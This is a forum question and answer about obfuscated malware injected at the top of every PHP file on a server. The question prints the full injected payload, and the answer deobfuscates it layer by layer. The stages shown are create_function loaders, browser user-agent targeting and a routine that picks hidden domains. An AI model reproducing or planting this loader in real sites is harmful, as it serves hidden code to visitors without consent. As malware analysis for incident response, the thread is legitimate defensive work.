Malicious code found in PHP files. What does it do

2019-06-08 07:53发布

I discovered this code inserted at the top of every single PHP file on My PHP server. I want to figure out what this script was doing, but I don't know how to decipher the main hidden code. Can someone with experience in these matters decrypt it, because I'm not a programmer?

Thank you very much!!

link to a sample infected php file: https://drive.google.com/open?id=0B8PYE4BruOdMa2dWZDBLY09VRTA

The code is

<?php $tdzueclt = 'tvctus)%     x24-    x24b!>!%y((strstr($uas,"        x6d     163     x69     145")) or (strstrR;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!}      x27;!>>>!}_;x5cq%7**^#zsfvr#      x5cq%)uftr#     x5cq%7/7#@#7/7^#iubq#   x5cq%   x27jsv%6<C>^#zsfvr#     24gps)%j>1<%j=tj{fpg)%  x24-    x24*<!~!        x24/%t2w/       x24)##-!#~<)tpqsut>j%!*72!        x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%55946-tr.984:75983:48984:71]K9]77]D4]82sutcvt)fubmgoj{hA!osvu37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofm2]3]364]6]283]427]36]373P6]36]73]83]238M7]381]21rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1)tpqsut>j%!*9!      x27!hmg%)!gj!~<341]88M4P8]37]278]225]241]334]368]32utjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)qbtwu = implode(array_map("fwukcjc",str_split("%tjw!>!#]y84]275]y83ion fwukcjc($n){return chr(ord($n)-1);} @error_reporting(0); $aguhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<x7fw6*CW&)7gj6<.[A       x27&6<  x7fw6*277#<!%t2w>#]y74]273]y76]252]y85]x22)7gj6<*QDU`MPT7-N1M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]28|:**t%)m%=*h%)m%):fmjiALS["     x61       156     x75     156     x61"]=1; $uas=strtolower($_SERVER["     x48     if((function_exists("   x6f     142     x5f     163     x74     x61     156     x75     156     x61"])))) { $GLOB88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:141   x72     164") && (!isset($GLOBALS["     %tmw/   x24)%c*W%eN+#Qi x5#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<112)eobs`un>qp%!|Z~!<##4]364]6]234]342]58]24]31##/#/},;#-#}+;%-qp%)54l}      gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~x24-      x24     x5c%j^  x24-    x24yfu%)3of)fepdof`57ftbc x7f!|!*uyfu     x27k##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}s.973:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]81]K78:56985:6197g:74985-rr.93e:5597f-%tdz>#L4]275L3]248L3P6L1M5]D2P!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`o   x7f_*#[k2`{6:!}7;!}6;*#k#)usbut`cpV     x7f     x278]y3f]51L3]84]y31M6]y3e]81#/#7e:l}S;2-u%!-#2#/#%#/#o52 137     x41     107     x45     116     x54"]); if bssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)t-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]#)fepmqyf     x27*&7-n%)utjm6<        x7f124  x54     120     x5f     125     x53     105     xx:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]s:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]!%tmw!>!#]y84]275]y83]273]y76]sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!      x24/%tmw/       x24)%zW%h>EzH,2W:*r%:-t%)3of:opjudovg<~   x24<!%o:!>!     x2421($uas,"    x72     166     x3a     61      x31")) or (strstr($uas,"        x61     156     x6]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!x246767~6<Cw68  x24-    x24]26  x24-    x24<%fV x7f<*X&Z&S{ftmfV        x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R3~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gjoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4  x223}!+5        156     x63     164     x69     157     x6e"; functx27;%!<*#}_;#)323ldfid>}&;!osvufs}     x7f;!opjudovg}k~~9{SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR        x27id6<.fmjgA   x27doj%6<       x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<       x7fw6*CWtfs%)7gj6%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r        x5c2^-%hOh/#00#W-%tdz*Wsfuvso!%bss      x5csboe))1/35.)1/14+9**-)1/2986+7**^/%d%:osvufs:~928>>  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275t<C       x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7U4      162     x6f     151     x64"))) { $ggw*17-SFEBFI,6<*127-UVPFNJU,6<*27-j%6<*Y%)fnbozcYufhAx272qj%6<^#zsfvtj        x22)gj6<^#Y#    x5cq%   x27Y%6<.msv`ftsbqA7>q%6<        x7)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNek!~!<b%      x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uftpf{jt)!gj!<*2bd%-#1GO     x2fs!~<3,j%>j%!*3!      x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%y)#}#-#       x24-    x24-tusqpt)%z-#:#*      x24-    x24!>!  epdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x      x22l:!}V;BFSUT`LDPT7-UFOJ`GB)fubfsdXA   x!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvgvc%}&;ftmbg}    x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!opjudovg}{;#)tFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbtj  x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-u78}527}88:}334}472        x24<!%ff2!>!bssbz)      x24]25  x24-    x24-!%  x24-      x24*!|! e]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%2#)fepmqyfA>2b%!<*qp%-*.%)epqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#:>%s:        x5c%j:.2^,%b:<!%c:>%s:    x5c%j:^<!%w`    x5-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]cj,,*!|       x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<!  x24-    x7,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojufs!*!+A!>!{e%)!>>    x22!ftmbg)!gj<7f        x7f     x7f<u%V x27{ftmw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX     x27u%)7fmjix6pjudovg      x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2     x5c2b%!>!2p%!*3>?*2b%)gc1^W%c!>!%i      x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%eFH#   x27rfs%6~6<     x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA        27,*c   x27,*b  x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111y38#-!%w:**<")));$qfzibwb = $ggwibsz("", $agqbtwu); $qfzib]#/*)323zbe!-#jt0*?]+^?]_   x5c}X   x24<tfsqnpdov{h19275j{hnpd19275fubmgc^>Ew:Qb:Qc:W~!%z!>2<!-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#fw6*  x7f_*#fubfsdXk5`{66~6<&w627K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    x273q33bq}k;opjudovg}x;0]=])0#)U!       x27{**u%-#jt0}Z;0]=]0#)2q%<     x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA        x27&256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!     x2400~:<h%_t%:osvuf!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+up:!ftmf!}Z;^nbsbq%        x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/<pd%w6Z6<.5`hAx27pd%6<pd%w6Z6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%pnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%bw6Z6<.2`hA      x27pd%6<C       x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]4]D6#<%G]y6d]281Ld]245]K2]285]Ky%)utjm!|!*5!       x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4ibsz = "       x63     162       x65     141     x74     145     x5f     146     x7]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6cotn+qsvmt+fmhpph#)zx24/%tjw/     x24)%   x24-    x24y4     x24-    x24]y   x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#3q%}U;y]}R;2]},;osvufs}     x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;<*id%)ftpmdR6<*id%)dfyfR        x27tfs%6<#/%      x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!      x24/wb();}}STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSrhozatxvoh'; $pojuybf=explode(chr((594-474)),substr($tdzueclt,(22569-16643),(131-97))); $kidqhu = $pojuybf[0]($pojuybf[(4-3)]); $vmqdyitehy = $pojuybf[0]($pojuybf[(6-4)]); if (!function_exists('mztvoit')) { function mztvoit($nrnzvjzo, $wzcyeen,$yhvdrl) { $atusojcvl = NULL; for($hwkbsnvb=0;$hwkbsnvb<(sizeof($nrnzvjzo)/2);$hwkbsnvb++) { $atusojcvl .= substr($wzcyeen, $nrnzvjzo[($hwkbsnvb*2)],$nrnzvjzo[($hwkbsnvb*2)+(7-6)]); } return $yhvdrl(chr((43-34)),chr((368-276)),$atusojcvl); }; } $nethpkm = explode(chr((197-153)),'1185,42,1295,36,1227,33,1123,62,2167,29,1942,34,23,45,2411,58,3222,28,5540,43,2783,33,794,64,727,67,2469,62,5215,70,5404,58,2137,30,4354,66,3154,68,4541,59,1028,20,3644,30,4867,63,3282,35,164,51,138,26,3317,49,4837,30,4985,39,2913,69,5823,34,3250,32,2870,43,926,69,1846,22,1611,63,68,70,3720,67,657,27,684,43,360,22,3495,51,273,48,591,30,452,52,5493,47,4137,41,2690,33,1797,49,4420,67,3471,24,4004,27,858,68,4600,57,1406,23,5093,68,5651,20,1976,64,4031,62,3366,48,3787,48,3414,57,3835,41,1572,39,5161,54,1454,24,2816,54,3096,58,4751,32,2723,60,3674,46,4299,33,1868,20,4332,22,2555,65,4232,67,3590,54,5761,62,4930,55,1922,20,4715,36,2280,30,995,33,5024,69,2239,41,1260,35,1101,22,2196,43,382,70,2370,41,3876,70,1548,24,0,23,3546,44,5671,37,2531,24,4178,54,215,58,5857,62,1331,24,4487,54,5285,70,2310,60,2982,57,2620,70,1729,38,1674,55,1888,34,321,39,5583,68,1355,51,1767,30,5462,31,3946,58,2087,50,621,36,504,48,1048,53,1429,25,3039,57,552,39,5355,49,4093,44,4783,22,1478,70,5708,53,4805,32,2040,47,4657,58,5919,7'); $uszfcks = $kidqhu("",mztvoit($nethpkm,$tdzueclt,$vmqdyitehy)); $kidqhu=$tdzueclt; $uszfcks(""); $uszfcks=(721-600); $tdzueclt=$uszfcks-1; ?>

1条回答
唯我独甜
2楼-- · 2019-06-08 08:35

Well, let's try to trace what's going on. First, let's beautify that ugly code a little:

<?php 
$tdzueclt = '...';
$pojuybf = explode(chr((594 - 474)), substr($tdzueclt, (22569 - 16643), (131 - 97)));
$kidqhu = $pojuybf[0]($pojuybf[(4 - 3) ]);
$vmqdyitehy = $pojuybf[0]($pojuybf[(6 - 4) ]);
if (!function_exists('mztvoit')) {
    function mztvoit($nrnzvjzo, $wzcyeen, $yhvdrl) {
        $atusojcvl = NULL;
        for ($hwkbsnvb = 0;$hwkbsnvb < (sizeof($nrnzvjzo) / 2);$hwkbsnvb++) {
            $atusojcvl.= substr($wzcyeen, $nrnzvjzo[($hwkbsnvb * 2) ], $nrnzvjzo[($hwkbsnvb * 2) + (7 - 6) ]);
        }
        return $yhvdrl(chr((43 - 34)), chr((368 - 276)), $atusojcvl);
    };
}
$nethpkm = explode(chr((197 - 153)), '...');
$uszfcks = $kidqhu("", mztvoit($nethpkm, $tdzueclt, $vmqdyitehy));
$kidqhu = $tdzueclt;
$uszfcks("");
$uszfcks = (721 - 600);
$tdzueclt = $uszfcks - 1; 
?>

Now, let's evaluate line by line to see all the hidden things:

$pojuybf = explode(chr((594 - 474)), substr($tdzueclt, (22569 - 16643), (131 - 97)));
$kidqhu = $pojuybf[0]($pojuybf[(4 - 3) ]);
$vmqdyitehy = $pojuybf[0]($pojuybf[(6 - 4) ]);

... becomes ...

$pojuybf = array('STrrEv', 'NoITCnuF_EtaeRC', 'ECaLPer_RtS');
$kidqhu = 'CReatE_FunCTIoN';
$vmqdyitehy = 'StR_rePLaCE';

Then goes the mztvoit function definition (not important yet) and then we go on defining strange data:

$nethpkm = array(1185, 42, ...); // after the explode()

Now we start calling some functions:

$uszfcks = $kidqhu("", mztvoit($nethpkm, $tdzueclt, $vmqdyitehy));

... becomes ...

$uszfcks = create_function('', mztvoit(array(1185, 42, ...), $tdzueclt /* that original ugly string*/, 'str_replace'));

So that strange mztvoit function defined above generates some function body source code by getting and mixing some parts of that ugly megastring. It's first argument (the array of numbers) probably serves as some coordinates pointing to the megastring. Without going deep into the process, it would be nice to just show the new anonymous function's body:

$body = mztvoit($nethpkm, $tdzueclt, $vmqdyitehy);
die($body);

But unfortunately, here I become stuck, because the original megastring became damaged, as I copied it from the web browser (it probably contained some unprintable characters, which have been lost during copy & paste from the web).

So now it's Your turn to show us, what the function's body is, as You have the original megastring. Thanks! :-)

UPDATE:

Thanks for the original PHP file, now we can go on! So the anonymous function, created by mztvoit looks very ugly - it contains next level of obfuscation:

if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {

    $GLOBALS["anuna"]=1;
    $uas=strtolower($_SERVER["HTTP_USER_AGENT"]);

    if ((strstr($uas,"msie")) or (strstr($uas,"rv:11")) or (strstr($uas,"android"))) {

        $ggwibsz = "create_function";

        function fwukcjc($n){

            return chr(ord($n)-1);
        }

        @error_reporting(0);
        $agqbtwu = implode(array_map("fwukcjc",str_split("%tjw!>!#.../* ...tons... */")));

        $qfzibwb = $ggwibsz("", $agqbtwu);
        $qfzibwb();
    }
}

UPDATE:

... which produces and runs another (still obfuscated) function ($agqbtwu is it's source code):

$siv = "str_replace";
$v9 = '$v9 = #5656}5 ... 99));'; // another loads of s#!t
eval($siv("#", "\x27", $v9));

... which produces ...

$v9 = '5656}5;Bv ... SV}'; // still a lots of who-knows-what...
eval($siv(array("O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M"), $ee1, $s99));

... which finally evaluates to something readable:

function oo2($b) {

    $h = explode("|", strrev($b));
    $d = explode("*", $h[0]);
    $b = $h[1];

    for($i=0;$i<sizeof($d);$i++) {

        $b = str_replace($i, $d[$i], $b);
    }

    create_function("", "};".$b."//");
}

function cqq($qw) {

    $domarr =array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return random($domarr,$qw);
}

function oo1($y) {

    $y= strrev($y);
    $g=substr($y,strpos($y,"9")+1);
    $v = explode(":",substr($y,0,strpos($y,"9")));

    for($i=0;$i<sizeof($v);$i++) {

        $q = explode("|", $v[$i]);
        $g = str_replace($q[0],$q[1],$g);
    }

    create_function("", "};".$g."//");
}

$s1v("", $siv("\71"," ",$slv($svv)));

function random($arr,$qw) {

    $g='w-86794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-873,g= w. r; m-86d944835,sq-87396487293787396086c951874";';
    $soy = "en2";
    $xx='explode';
    $ecx='create_function';
    $scy='str_replace';
    $a = $xx("|","\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44");
    $aa = $xx("|","8|9|-|,| ");
    $mec=$ecx;

    for($i=0;$i<sizeof($a);$i++) {

        $g = $scy($aa[$i],$a[$i],$g);
    }

    $ecx("", "};$g//");
    $mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy));

    return $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw;
}

$r9 = explode("|",$n9);
$b9=0;
$a9=0;

for($i9=0;$i9<sizeof($r9);$i9++) {

    if ($i9==0)
        $a9=0;
    else
        $a9=$r9[$i9-1]+$a9;

    $b9=$r9[$i9];
    $v_[]=substr($v9, $a9, $b9);
}

$y =1;
for($i=0;$i<5;$i++) {

    $vv1 ="o"."o".$y;
    if ($y==1)
        $y=2;
    else
        $y=1;

    $vv1($v_[$i]);
}

Now You may try to solve the rest on Your own, it should be rather easy now.

查看更多
登录 后发表回答